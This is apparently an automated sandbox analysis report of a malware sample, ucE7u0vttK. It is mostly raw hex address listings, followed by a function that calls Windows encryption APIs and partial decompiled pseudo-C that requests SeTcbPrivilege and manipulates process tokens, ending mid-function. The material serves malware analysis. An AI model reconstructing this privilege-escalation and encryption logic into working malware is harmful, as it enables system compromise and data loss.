    0x00000000
    0x00000000
    0x003d3709
    0x003d370d
    0x00000000
    0x003d370d
    0x003d28ea
    0x003d28ea
    0x003d28ed
    0x003d28fe
    0x003d2900
    0x003d290b
    0x003d290b
    0x003d290f
    0x003d353b
    0x003d3542
    0x00000000
    0x003d3542
    0x003d2915
    0x003d2915
    0x003d2917
    0x003d291b
    0x003d291e
    0x003d291e
    0x003d2921
    0x003d2921
    0x003d2924
    0x003d2936
    0x003d293a
    0x003d293e
    0x003d2941
    0x003d2941
    0x003d2944
    0x003d2944
    0x003d2947
    0x003d294a
    0x003d354d
    0x003d3554
    0x00000000
    0x003d3554
    0x003d2950
    0x003d2953
    0x003d2953
    0x003d2953
    0x003d2956
    0x003d2959
    0x003d2959
    0x003d295d
    0x003d29bc
    0x003d29bc
    0x003d29c0
    0x003d29fd
    0x003d29fd
    0x003d2a00
    0x003d29d7
    0x003d29da
    0x003d29ed
    0x003d29f0
    0x003d29f0
    0x003d29f0
    0x003d29f3
    0x003d29f7
    0x003d29fa
    0x003d29fa
    0x00000000
    0x003d29fa
    0x003d29dc
    0x003d29dc
    0x003d29e0
    0x003d358d
    0x003d3594
    0x00000000
    0x003d3594
    0x003d29e6
    0x00000000
    0x003d29e6
    0x003d2a05
    0x003d2a09
    0x003d2a0c
    0x003d2a0f
    0x003d2a12
    0x003d2a12
    0x003d2a14
    0x003d2a17
    0x003d2a1a
    0x003d345a
    0x003d345f
    0x003d3461
    0x003d3434
    0x003d3437
    0x003d344a
    0x003d344d
    0x003d344d
    0x003d344d
    0x003d3450
    0x003d3454
    0x003d3457
    0x003d3457
    0x00000000
    0x003d3457
    0x003d3439
    0x003d3439
    0x003d343d
    0x003d359f
    0x003d35a6
    0x00000000
    0x003d35a6
    0x003d3443
    0x00000000
    0x003d3443
    0x003d3465
    0x003d3468
    0x003d346b
    0x003d346d
    0x003d346d
    0x003d346d
    0x003d3471
    0x003d3471
    0x003d3475
    0x003d3514
    0x003d3528
    0x003d352b
    0x003d352d
    0x00000000
    0x00000000
    0x003d3533
    0x00000000
    0x003d3533
    0x003d347b
    0x003d347d
    0x003d34c7
    0x003d34c7
    0x003d34ca
    0x003d34a1
    0x003d34a4
    0x003d34b7
    0x003d34ba
    0x003d34ba
    0x003d34ba
    0x003d34bd
    0x003d34c1
    0x003d34c4
    0x003d34c4
    0x00000000
    0x003d34c4
    0x003d34a6
    0x003d34a6
    0x003d34aa
    0x003d35b1
    0x003d35b8
    0x00000000
    0x003d35b8
    0x003d34b0
    0x00000000
    0x003d34b0
    0x003d34d2
    0x003d34d6
    0x003d34dd
    0x003d34f4
    0x003d34f4
    0x00000000
    0x003d34f4
    0x003d3482
    0x003d3485
    0x003d34ea
    0x003d34ea
    0x003d34ea
    0x003d34ed
    0x00000000
    0x003d34ed
    0x003d3487
    0x003d3487
    0x003d348b
    0x003d35c3
    0x003d35ca
    0x00000000
    0x003d35ca
    0x003d3494
    0x00000000
    0x003d3494
    0x003d2a20
    0x003d2a23
    0x003d35d5
    0x003d35d5
    0x00000000
    0x003d35d5
    0x003d2a29
    0x003d2a2c
    0x003d2a91
    0x003d2a91
    0x003d2a93
    0x003d2a93
    0x003d2a96
    0x003d2a99
    0x003d2b17
    0x003d2b1c
    0x003d2b1f
    0x003d2b1f
    0x003d2b1f
    0x003d2b23
    0x003d2b26
    0x003d2b29
    0x003d2c9a
    0x003d2c9a
    0x003d2c9d
    0x003d2c74
    0x003d2c77
    0x003d2c8a
    0x003d2c8d
    0x003d2c8d
    0x003d2c8d
    0x003d2c90
    0x003d2c94
    0x003d2c97
    0x003d2c97
    0x00000000
    0x003d2c97
    0x003d2c79
    0x003d2c79
    0x003d2c7d
    0x003d35f2
    0x003d35f9
    0x00000000
    0x003d35f9
    0x003d2c83
    0x00000000
    0x003d2c83
    0x003d2ca5
    0x003d2cac
    0x003d2cb3
    0x003d2cb6
    0x003d2cb9
    0x003d2cbc
    0x00000000
    0x003d2cbc
    0x003d2b2f
    0x003d2b36
    0x003d2b36
    0x003d2b39
    0x003d2b3b
    0x003d2f54
    0x003d2f54
    0x003d2f57
    0x003d2f5a
    0x003d2f5d
    0x00000000
    0x00000000
    0x003d2f69
    0x003d2f6c
    0x00000000
    0x00000000
    0x003d2f72
    0x003d2f75
    0x003d2f7d
    0x003d2f85
    0x003d2f88
    0x003d2f88
    0x003d2f88
    0x003d2f93
    0x003d2f9b
    0x003d2f9d
    0x003d2fa8
    0x003d2fa9
    0x003d2fb7
    0x003d2fbf
    0x003d2fc0
    0x003d2fc0
    0x00000000
    0x003d2f9f
    0x003d2fa1
    0x003d2fc4
    0x003d2fc6
    0x003d2fc9
    0x003d2fcb
    0x003d2fce
    0x003d2fd3
    0x003d3169
    0x003d3169
    0x003d3170
    0x003d3177
    0x00000000
    0x00000000
    0x003d3180
    0x003d3187
    0x003d3187
    0x003d318d
    0x003d3193
    0x003d3196
    0x003d3199
    0x003d319b
    0x003d31e4
    0x003d31e4
    0x003d31e7
    0x003d3290
    0x003d3298
    0x003d32a0
    0x003d32a2
    0x003d32b2
    0x003d32b3
    0x003d32c1
    0x003d32c9
    0x003d32ca
    0x003d32ca
    0x003d32ce
    0x003d32d0
    0x003d32d3
    0x003d32e1
    0x003d32e3
    0x003d32e6
    0x003d32e9
    0x003d32eb
    0x003d3331
    0x003d3331
    0x003d3336
    0x003d3339
    0x003d333c
    0x003d333f
    0x003d334b
    0x003d3351
    0x003d3354
    0x003d3356
    0x003d3358
    0x003d3358
    0x003d335d
    0x003d3360
    0x003d3396
    0x003d339a
    0x003d33f5
    0x003d33f5
    0x003d33f8
    0x003d33f8
    0x003d33fa
    0x003d33fe
    0x003d3403
    0x003d3409
    0x003d340c
    0x003d340f
    0x003d3412
    0x003d3412
    0x003d3418
    0x003d341c
    0x003d341f
    0x00000000
    0x00000000
    0x003d3425
    0x003d342b
    0x003d342d
    0x003d33ea
    0x003d33ed
    0x00000000
    0x003d33ed
    0x003d33e4
    0x003d33e7
    0x00000000
    0x003d33e7
    0x003d339f
    0x003d33a2
    0x00000000
    0x00000000
    0x003d33a7
    0x003d33ad
    0x003d33ad
    0x003d33af
    0x003d33b1
    0x003d33b6
    0x003d33b9
    0x003d33bc
    0x003d33bf
    0x003d33bf
    0x003d33c3
    0x003d33c7
    0x003d33cb
    0x003d33ce
    0x00000000
    0x00000000
    0x003d33d0
    0x003d33d4
    0x00000000
    0x00000000
    0x003d33da
    0x003d33e0
    0x003d33e2
    0x00000000
    0x00000000
    0x00000000
    0x003d3362
    0x003d3362
    0x003d3365
    0x003d3368
    0x003d336a
    0x00000000
    0x00000000
    0x003d3370
    0x003d3370
    0x003d3373
    0x003d3376
    0x003d3694
    0x003d369b
    0x00000000
    0x003d369b
    0x003d338b
    0x003d338e
    0x003d3391
    0x00000000
    0x003d3391
    0x003d3360
    0x003d3341
    0x003d3345
    0x003d28c1
    0x003d28c1
    0x00000000
    0x003d28c1
    0x00000000
    0x003d3345
    0x003d3318
    0x003d3318
    0x003d331b
    0x003d32f2
    0x003d32f5
    0x003d3308
    0x003d330b
    0x003d330b
    0x003d330b
    0x003d330e
    0x003d3312
    0x003d3315
    0x003d3315
    0x00000000
    0x003d3315
    0x003d32f7
    0x003d32f7
    0x003d32fb
    0x003d3682
    0x003d3689
    0x00000000
    0x003d3689
    0x003d3301
    0x00000000
    0x003d3301
    0x003d331d
    0x003d3325
    0x003d332b
    0x003d332e
    0x003d332e
    0x003d332e
    0x00000000
    0x003d332e
    0x003d32a6
    0x003d32a9
    0x00000000
    0x003d32a9
    0x003d31f0
    0x003d31f5
    0x003d31f8
    0x003d3285
    0x003d328a
    0x003d328d
    0x003d328d
    0x00000000
    0x003d328d
    0x003d31fa
    0x003d3202
    0x003d320a
    0x003d320c
    0x003d321d
    0x003d321e
    0x003d3220
    0x003d3242
    0x003d3245
    0x003d3248
    0x003d325b
    0x003d325e
    0x003d325e
    0x003d325e
    0x003d3261
    0x003d3263
    0x003d3265
    0x003d3268
    0x003d326b
    0x003d326e
    0x00000000
    0x00000000
    0x00000000
    0x003d3270
    0x003d324a
    0x003d324a
    0x003d324e
    0x003d3670
    0x003d3677
    0x00000000
    0x003d3677
    0x003d3254
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d3222
    0x003d3222
    0x003d322e
    0x003d3236
    0x003d3237
    0x003d3239
    0x00000000
    0x00000000
    0x003d323b
    0x003d323e
    0x003d3240
    0x00000000
    0x00000000
    0x00000000
    0x003d3240
    0x00000000
    0x003d3222
    0x003d320e
    0x003d3211
    0x003d3213
    0x00000000
    0x00000000
    0x003d3215
    0x003d3217
    0x00000000
    0x00000000
    0x00000000
    0x003d3219
    0x003d319d
    0x003d319f
    0x003d31d2
    0x003d31d2
    0x003d31de
    0x003d31e1
    0x003d31e1
    0x003d31e1
    0x00000000
    0x003d31e1
    0x003d31a1
    0x003d31a4
    0x003d31a7
    0x003d31ba
    0x003d31bd
    0x003d31bd
    0x003d31bd
    0x003d31c0
    0x003d31c2
    0x003d31c4
    0x003d31c7
    0x003d31ca
    0x003d31cd
    0x00000000
    0x00000000
    0x003d31cf
    0x00000000
    0x003d31cf
    0x003d31a9
    0x003d31a9
    0x003d31ad
    0x003d365e
    0x003d3665
    0x00000000
    0x003d3665
    0x003d31b3
    0x00000000
    0x003d31b3
    0x003d2fd9
    0x003d2fdc
    0x003d2fe4
    0x003d2fec
    0x003d2fef
    0x003d2fef
    0x003d2fef
    0x003d2ffa
    0x003d3002
    0x003d3004
    0x003d300f
    0x003d3010
    0x003d301e
    0x003d3026
    0x003d3027
    0x003d3027
    0x00000000
    0x003d3006
    0x003d3008
    0x003d302b
    0x003d302b
    0x003d3030
    0x003d3036
    0x003d3038
    0x003d303a
    0x003d303f
    0x003d3163
    0x003d3163
    0x003d3163
    0x003d3166
    0x00000000
    0x003d3166
    0x003d3045
    0x003d304b
    0x00000000
    0x003d304b
    0x003d3004
    0x003d2f9d
    0x003d3053
    0x003d3056
    0x003d30fa
    0x003d3102
    0x003d310a
    0x003d310c
    0x003d311c
    0x003d311d
    0x003d312b
    0x003d3133
    0x003d3134
    0x003d3134
    0x003d3138
    0x003d313a
    0x003d313d
    0x003d313f
    0x003d3142
    0x003d3147
    0x00000000
    0x00000000
    0x003d3149
    0x003d3149
    0x003d314c
    0x003d314f
    0x003d36a6
    0x003d36ad
    0x00000000
    0x003d36ad
    0x003d3158
    0x003d315b
    0x00000000
    0x003d315b
    0x003d3110
    0x003d3113
    0x00000000
    0x003d3113
    0x003d305c
    0x003d305f
    0x003d30d9
    0x003d30ef
    0x003d30f4
    0x003d30f7
    0x003d30f7
    0x00000000
    0x003d30f7
    0x003d3061
    0x003d3069
    0x003d3071
    0x003d3073
    0x003d3084
    0x003d3085
    0x003d3087
    0x003d30a9
    0x003d30ac
    0x003d30af
    0x003d30c2
    0x003d30c5
    0x003d30c5
    0x003d30c5
    0x003d30c8
    0x003d30ca
    0x003d30cc
    0x003d30cf
    0x003d30d2
    0x003d30d5
    0x00000000
    0x00000000
    0x00000000
    0x003d30d7
    0x003d30b1
    0x003d30b1
    0x003d30b5
    0x003d364c
    0x003d3653
    0x00000000
    0x003d3653
    0x003d30bb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d3089
    0x003d3089
    0x003d3095
    0x003d309d
    0x003d309e
    0x003d30a0
    0x00000000
    0x00000000
    0x003d30a2
    0x003d30a5
    0x003d30a7
    0x00000000
    0x00000000
    0x00000000
    0x003d30a7
    0x00000000
    0x003d3089
    0x003d3075
    0x003d3078
    0x003d307a
    0x00000000
    0x00000000
    0x003d307c
    0x003d307e
    0x00000000
    0x00000000
    0x00000000
    0x003d3080
    0x003d2b49
    0x003d2b49
    0x003d2b57
    0x003d2b61
    0x003d2b69
    0x003d2b73
    0x003d2b7b
    0x003d2b83
    0x003d2b87
    0x003d2b8a
    0x003d2b8c
    0x003d2b8f
    0x003d2b91
    0x003d2bac
    0x003d2bac
    0x003d2bb0
    0x003d2bb0
    0x003d2bb2
    0x003d2bb5
    0x003d2bb8
    0x003d2bb9
    0x003d2bb9
    0x003d2bc2
    0x003d2bc4
    0x003d2bc8
    0x003d2bcb
    0x003d2bcd
    0x003d2bcd
    0x003d2bd2
    0x003d2bd8
    0x003d2be3
    0x003d2be3
    0x003d2be7
    0x003d2beb
    0x003d2bef
    0x003d2bf2
    0x003d2d49
    0x003d2d49
    0x003d2d4d
    0x003d2f4c
    0x003d2f4c
    0x00000000
    0x003d2f4c
    0x003d2d53
    0x003d2d53
    0x003d2d53
    0x003d2d57
    0x003d2d5d
    0x003d2d60
    0x003d2f0d
    0x003d2f15
    0x003d2f18
    0x003d3641
    0x003d3641
    0x00000000
    0x003d3641
    0x003d2f2a
    0x003d2f44
    0x003d2f49
    0x00000000
    0x003d2f49
    0x003d2d66
    0x003d2d69
    0x003d2e12
    0x003d2e1a
    0x003d2e22
    0x003d2e24
    0x003d2e34
    0x003d2e35
    0x003d2e43
    0x003d2e4b
    0x003d2e4c
    0x003d2e4c
    0x003d2e50
    0x003d2e52
    0x003d2e55
    0x003d2e57
    0x003d2e5a
    0x003d2e5d
    0x003d2e60
    0x003d2e74
    0x003d2e80
    0x003d2e80
    0x003d2e87
    0x003d2e8a
    0x003d2e8c
    0x003d2ebf
    0x003d2ebf
    0x003d2ec7
    0x003d2ec9
    0x003d2ed0
    0x003d2eda
    0x003d2edc
    0x003d2edf
    0x003d2eee
    0x003d2eee
    0x003d2ee1
    0x003d2ee4
    0x003d2ee4
    0x003d2efd
    0x003d2f02
    0x003d2f05
    0x00000000
    0x003d2f05
    0x003d2e8e
    0x003d2e91
    0x003d2e94
    0x003d2ea7
    0x003d2eaa
    0x003d2eaa
    0x003d2eaa
    0x003d2ead
    0x003d2eaf
    0x003d2eb1
    0x003d2eb4
    0x003d2eb7
    0x003d2eba
    0x00000000
    0x00000000
    0x003d2ebc
    0x00000000
    0x003d2ebc
    0x003d2e96
    0x003d2e96
    0x003d2e9a
    0x003d362f
    0x003d3636
    0x00000000
    0x003d3636
    0x003d2ea0
    0x00000000
    0x003d2ea0
    0x003d2e76
    0x003d2e7a
    0x003d3624
    0x003d3624
    0x00000000
    0x003d3624
    0x00000000
    0x003d2e7a
    0x003d2e65
    0x003d2e68
    0x00000000
    0x003d2e68
    0x003d2e28
    0x003d2e2b
    0x00000000
    0x003d2e2b
    0x003d2d72
    0x003d2d77
    0x003d2d7a
    0x003d2dfb
    0x003d2e07
    0x003d2e0c
    0x003d2e0f
    0x003d2e0f
    0x00000000
    0x003d2e0f
    0x003d2d7c
    0x003d2d84
    0x003d2d8c
    0x003d2d8e
    0x003d2d9f
    0x003d2da0
    0x003d2da2
    0x003d2dc4
    0x003d2dc7
    0x003d2dca
    0x003d2ddd
    0x003d2de0
    0x003d2de0
    0x003d2de0
    0x003d2de3
    0x003d2de5
    0x003d2de7
    0x003d2dea
    0x003d2ded
    0x003d2df0
    0x00000000
    0x00000000
    0x00000000
    0x003d2df2
    0x003d2dcc
    0x003d2dcc
    0x003d2dd0
    0x003d3612
    0x003d3619
    0x00000000
    0x003d3619
    0x003d2dd6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d2da4
    0x003d2da4
    0x003d2db0
    0x003d2db8
    0x003d2db9
    0x003d2dbb
    0x00000000
    0x00000000
    0x003d2dbd
    0x003d2dc0
    0x003d2dc2
    0x00000000
    0x00000000
    0x00000000
    0x003d2dc2
    0x00000000
    0x003d2da4
    0x003d2d90
    0x003d2d93
    0x003d2d95
    0x00000000
    0x00000000
    0x003d2d97
    0x003d2d99
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d2bf8
    0x003d2bf8
    0x003d2bfb
    0x003d2bff
    0x003d2c01
    0x003d2c03
    0x00000000
    0x00000000
    0x003d2c09
    0x003d2c0d
    0x003d2c0f
    0x003d2c13
    0x003d2c15
    0x003d2c17
    0x003d2c19
    0x003d2c2b
    0x003d2c2b
    0x003d2c2e
    0x003d2cd0
    0x003d2cd0
    0x003d2cd7
    0x003d2cda
    0x003d2cdc
    0x003d2cde
    0x003d2ce1
    0x003d2ce1
    0x003d2ce1
    0x003d2ce5
    0x003d2ce5
    0x003d2ce8
    0x003d2ceb
    0x003d2cee
    0x003d2d20
    0x003d2d29
    0x003d2d29
    0x003d2d2b
    0x003d2d33
    0x003d2d33
    0x00000000
    0x003d2cf0
    0x003d2cf0
    0x003d2cf3
    0x003d2cf3
    0x003d2d03
    0x003d2d06
    0x003d2d09
    0x003d2d0c
    0x003d2d1a
    0x003d2d0e
    0x003d2d0e
    0x003d2d11
    0x003d2d15
    0x003d2d15
    0x003d2d1d
    0x003d2d1d
    0x003d2d1d
    0x00000000
    0x003d2cf3
    0x003d2cee
    0x003d2c3f
    0x003d2c42
    0x003d2c47
    0x00000000
    0x00000000
    0x003d2c50
    0x003d2c52
    0x003d2c52
    0x003d2c59
    0x003d2c5d
    0x003d2c5f
    0x003d2c62
    0x003d2c65
    0x003d2c65
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d2c1b
    0x003d2c1b
    0x003d2c1e
    0x003d2c26
    0x003d2c28
    0x003d2c28
    0x003d2c28
    0x00000000
    0x003d2d36
    0x003d2d36
    0x003d2d39
    0x003d2d3f
    0x003d2d3f
    0x00000000
    0x003d2bf8
    0x003d2bda
    0x003d2bdd
    0x003d3604
    0x003d3607
    0x003d3607
    0x00000000
    0x003d3607
    0x00000000
    0x003d2bdd
    0x003d2b96
    0x003d2b9a
    0x003d2ba5
    0x003d2ba7
    0x003d2ba8
    0x003d2ba8
    0x00000000
    0x003d2b9a
    0x003d2a9b
    0x003d2a9b
    0x003d2aa2
    0x003d2aa4
    0x003d2adf
    0x003d2ae8
    0x003d2aec
    0x003d2aec
    0x003d2afa
    0x003d2afd
    0x003d2b01
    0x003d2b03
    0x003d2b06
    0x00000000
    0x003d2b06
    0x003d2aa6
    0x003d2aa9
    0x003d2aac
    0x003d2abf
    0x003d2ac2
    0x003d2ac2
    0x003d2ac2
    0x003d2ac5
    0x003d2ac7
    0x003d2ac9
    0x003d2acc
    0x003d2acf
    0x003d2ad2
    0x003d2ad2
    0x003d2ad9
    0x003d2adb
    0x00000000
    0x00000000
    0x003d2add
    0x00000000
    0x003d2add
    0x003d2aae
    0x003d2aae
    0x003d2ab2
    0x003d35e0
    0x003d35e7
    0x00000000
    0x003d35e7
    0x003d2ab8
    0x00000000
    0x003d2ab8
    0x003d2a30
    0x003d2a36
    0x003d2a40
    0x003d2a47
    0x003d2a55
    0x003d2a57
    0x003d2a5e
    0x003d2a67
    0x003d2a79
    0x003d2a7a
    0x003d2a7a
    0x003d2a82
    0x003d2a8a
    0x003d2a8b
    0x00000000
    0x003d2a8b
    0x003d29c2
    0x003d29c6
    0x00000000
    0x00000000
    0x003d29cc
    0x003d36da
    0x003d36df
    0x003d36e1
    0x003d36b8
    0x003d36bb
    0x003d36ca
    0x003d36cd
    0x003d36cd
    0x003d36cd
    0x003d36d0
    0x003d36d4
    0x003d36d7
    0x003d36d7
    0x00000000
    0x003d36d7
    0x003d36bd
    0x003d36bd
    0x003d36c1
    0x003d36f3
    0x003d36fa
    0x00000000
    0x003d36fa
    0x003d36c3
    0x00000000
    0x003d36c3
    0x003d36e5
    0x003d36e8
    0x003d36eb
    0x003d36ed
    0x00000000
    0x003d36ed
    0x003d295f
    0x003d2961
    0x00000000
    0x00000000
    0x003d2963
    0x003d2963
    0x003d2967
    0x00000000
    0x00000000
    0x003d2969
    0x003d296c
    0x003d296f
    0x003d355f
    0x003d3566
    0x00000000
    0x003d3566
    0x003d2975
    0x003d2975
    0x003d2978
    0x003d3571
    0x003d3575
    0x00000000
    0x00000000
    0x003d357b
    0x003d3582
    0x00000000
    0x003d3582
    0x003d2981
    0x003d2984
    0x003d2987
    0x003d2989
    0x003d298b
    0x003d298d
    0x003d298d
    0x003d298f
    0x003d2992
    0x003d299c
    0x003d2994
    0x003d2994
    0x003d2996
    0x003d2998
    0x003d2998
    0x003d2996
    0x003d29a6
    0x003d29ab
    0x003d29ae
    0x003d29b1
    0x003d29b4
    0x003d29b7
    0x00000000
    0x003d29b7
    0x003d2926
    0x003d2929
    0x00000000
    0x00000000
    0x003d292e
    0x003d2931
    0x00000000
    0x003d2931
    0x003d2902
    0x003d2906
    0x00000000
    0x003d2906
    0x003d28ef
    0x003d28ef
    0x003d28f0
    0x00000000
    0x00000000
    0x003d28f2
    0x003d28f3
    0x00000000
    0x00000000
    0x00000000
    0x003d28f9
    0x003d2835
    0x00000000
    0x00000000
    0x003d283b
    0x003d283e
    0x003d28aa
    0x003d28aa
    0x003d28ad
    0x00000000
    0x00000000
    0x003d28b3
    0x003d28b3
    0x003d28b4
    0x003d2729
    0x003d2729
    0x00000000
    0x003d2729
    0x003d28ba
    0x003d28bb
    0x00000000
    0x00000000
    0x00000000
    0x003d28bb
    0x003d2840
    0x00000000
    0x00000000
    0x003d2846
    0x003d2846
    0x003d2849
    0x003d2896
    0x003d2898
    0x00000000
    0x00000000
    0x003d289e
    0x003d28a2
    0x00000000
    0x003d28a2
    0x003d284b
    0x003d284b
    0x003d284c
    0x003d2882
    0x003d2884
    0x00000000
    0x00000000
    0x003d288a
    0x003d288e
    0x00000000
    0x003d288e
    0x003d284e
    0x003d284e
    0x003d284f
    0x003d286e
    0x003d2870
    0x00000000
    0x00000000
    0x003d2876
    0x003d287a
    0x00000000
    0x003d287a
    0x003d2851
    0x003d2854
    0x00000000
    0x00000000
    0x003d285a
    0x003d285c
    0x00000000
    0x00000000
    0x003d2862
    0x003d2866
    0x00000000
    0x003d2866
    0x003d2608
    0x00000000
    0x00000000
    0x003d260e
    0x003d2611
    0x003d2795
    0x003d2795
    0x003d2798
    0x003d2816
    0x003d2818
    0x003d281a
    0x00000000
    0x00000000
    0x003d2820
    0x003d2824
    0x00000000
    0x003d2824
    0x003d279a
    0x003d279a
    0x003d279d
    0x003d2800
    0x003d2802
    0x003d2804
    0x00000000
    0x00000000
    0x003d280a
    0x003d280e
    0x00000000
    0x003d280e
    0x003d27a0
    0x003d27a0
    0x003d27a1
    0x003d27ea
    0x003d27ec
    0x003d27ee
    0x00000000
    0x00000000
    0x003d27f4
    0x003d27f8
    0x00000000
    0x003d27f8
    0x003d27a3
    0x003d27a3
    0x003d27a4
    0x00000000
    0x00000000
    0x003d27aa
    0x003d27aa
    0x003d27ab
    0x003d27d4
    0x003d27d6
    0x003d27d8
    0x00000000
    0x00000000
    0x003d27de
    0x003d27e2
    0x00000000
    0x003d27e2
    0x003d27ad
    0x003d27ad
    0x003d27b0
    0x00000000
    0x00000000
    0x003d27b7
    0x003d27b8
    0x00000000
    0x00000000
    0x003d27be
    0x003d27c0
    0x003d27c2
    0x00000000
    0x00000000
    0x003d27c8
    0x003d27cc
    0x00000000
    0x003d27cc
    0x003d2617
    0x00000000
    0x00000000
    0x003d2620
    0x00000000
    0x00000000
    0x003d2626
    0x00000000
    0x003d262d
    0x003d2632
    0x003d2635
    0x003d2638
    0x003d263b
    0x003d263e
    0x003d2641
    0x003d2644
    0x003d2647
    0x003d264a
    0x003d2650
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d2656
    0x003d2656
    0x003d265a
    0x003d2668
    0x003d266c
    0x003d267b
    0x003d267b
    0x003d267b
    0x00000000
    0x003d267b
    0x003d2671
    0x003d2674
    0x00000000
    0x003d265c
    0x003d2660
    0x003d2663
    0x003d267f
    0x003d267f
    0x003d2684
    0x00000000
    0x00000000
    0x003d2689
    0x003d268c
    0x00000000
    0x003d268c
    0x00000000
    0x003d2691
    0x003d2693
    0x003d2695
    0x003d26a3
    0x003d26a3
    0x003d26a7
    0x003d26bb
    0x003d26bb
    0x003d26bb
    0x003d26bf
    0x003d26bf
    0x003d26c2
    0x003d26ca
    0x003d26d0
    0x003d26d1
    0x003d26d5
    0x003d26e9
    0x003d26e4
    0x003d26e4
    0x003d26e4
    0x003d26f4
    0x003d2701
    0x003d2708
    0x003d2718
    0x003d2718
    0x003d2712
    0x003d2712
    0x003d2712
    0x003d2719
    0x003d2719
    0x003d2720
    0x003d2723
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d2723
    0x003d26a9
    0x003d26b0
    0x00000000
    0x003d26b0
    0x003d2697
    0x003d269a
    0x003d269b
    0x003d269e
    0x00000000
    0x00000000
    0x003d2734
    0x003d2736
    0x003d2738
    0x00000000
    0x00000000
    0x003d273e
    0x003d2742
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d274a
    0x003d274c
    0x003d274e
    0x00000000
    0x00000000
    0x003d2754
    0x003d2758
    0x00000000
    0x00000000
    0x003d2760
    0x003d2762
    0x003d2764
    0x00000000
    0x00000000
    0x003d276a
    0x003d276e
    0x00000000
    0x00000000
    0x003d2776
    0x003d2778
    0x003d277a
    0x00000000
    0x00000000
    0x003d2780
    0x003d2782
    0x003d2785
    0x003d2786
    0x003d278d
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x003d2626

    APIs
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003D3BB7, Relevance: 10.7, APIs: 7, Instructions: 238encryption
    APIs
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
    • CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
    • CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
    • CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
    • CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    Function 003CF990, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 204library
    C-Code - Quality: 53%
    			E003CF990(intOrPtr* _a4) {
				_Unknown_base(*)()* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				char _v44;
				char _v60;
				char _v160;
				intOrPtr _t53;
				intOrPtr* _t57;
				intOrPtr* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t68;
				intOrPtr _t70;
				signed int _t74;
				intOrPtr* _t75;
				intOrPtr _t99;
				intOrPtr* _t104;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t120;
				intOrPtr _t121;
				intOrPtr _t123;
				intOrPtr _t124;
				intOrPtr _t128;
				signed int _t130;
				signed int _t131;
				struct HINSTANCE__* _t132;
				_Unknown_base(*)()* _t139;

				_v16 = 0;
				_v12 = 0xffffffff;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_t139 =  *0x3e85c8; // 0x0
				if(_t139 != 0) {
					L3:
					_t53 =  *0x3e8628; // 0x622508
					_v28 = 0;
					_t20 = _t53 + 0x150; // 0x622658
					_t130 = _t20;
					_push( *((intOrPtr*)( *((intOrPtr*)(_t53 + 0x100))))(0x28,  &_v8));
					if( *((intOrPtr*)( *_t130))() != 0) {
						_t121 =  *0x3e8628; // 0x622508
						_push( &_v40);
						_push(L"SeTcbPrivilege");
						_push(0);
						if( *((intOrPtr*)( *((intOrPtr*)(_t121 + 0x188))))() != 0) {
							_t123 =  *0x3e8628; // 0x622508
							_v44 = 1;
							_v32 = 2;
							 *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x18c))))(_v8, 0,  &_v44, 0x10,  &_v60,  &_v28);
						}
					}
					_t57 =  *0x3e85dc; // 0x0
					_t131 = _t130 | 0xffffffff;
					if(_t57 == 0) {
						L17:
						_t58 =  *0x3e85fc; // 0x0
						if(_t58 == 0) {
							L22:
							_t59 = _v8;
							if(_t59 == 0) {
								L24:
								return _t59;
							}
							_t113 =  *0x3e8628; // 0x622508
							 *((intOrPtr*)( *((intOrPtr*)(_t113 + 0x18c))))(_t59, 0,  &_v60, 0x10, 0, 0);
							_t114 =  *0x3e8628; // 0x622508
							return  *((intOrPtr*)( *((intOrPtr*)(_t114 + 0xf8))))(_v8);
						}
						_t131 =  *_t58();
						if(_t131 == 0xffffffff) {
							goto L22;
						}
						L19:
						_t99 =  *0x3e8628; // 0x622508
						 *((intOrPtr*)( *((intOrPtr*)(_t99 + 0x190))))();
						_push( &_v12);
						_push(_t131);
						if( *0x3e85c8() != 0) {
							_t68 =  *0x3e8628; // 0x622508
							_push( &_v16);
							_push(1);
							_push(1);
							_push(0);
							_push(0x2000000);
							_push(_v12);
							if( *((intOrPtr*)( *((intOrPtr*)(_t68 + 0x144))))() != 0) {
								_t70 =  *0x3e8628; // 0x622508
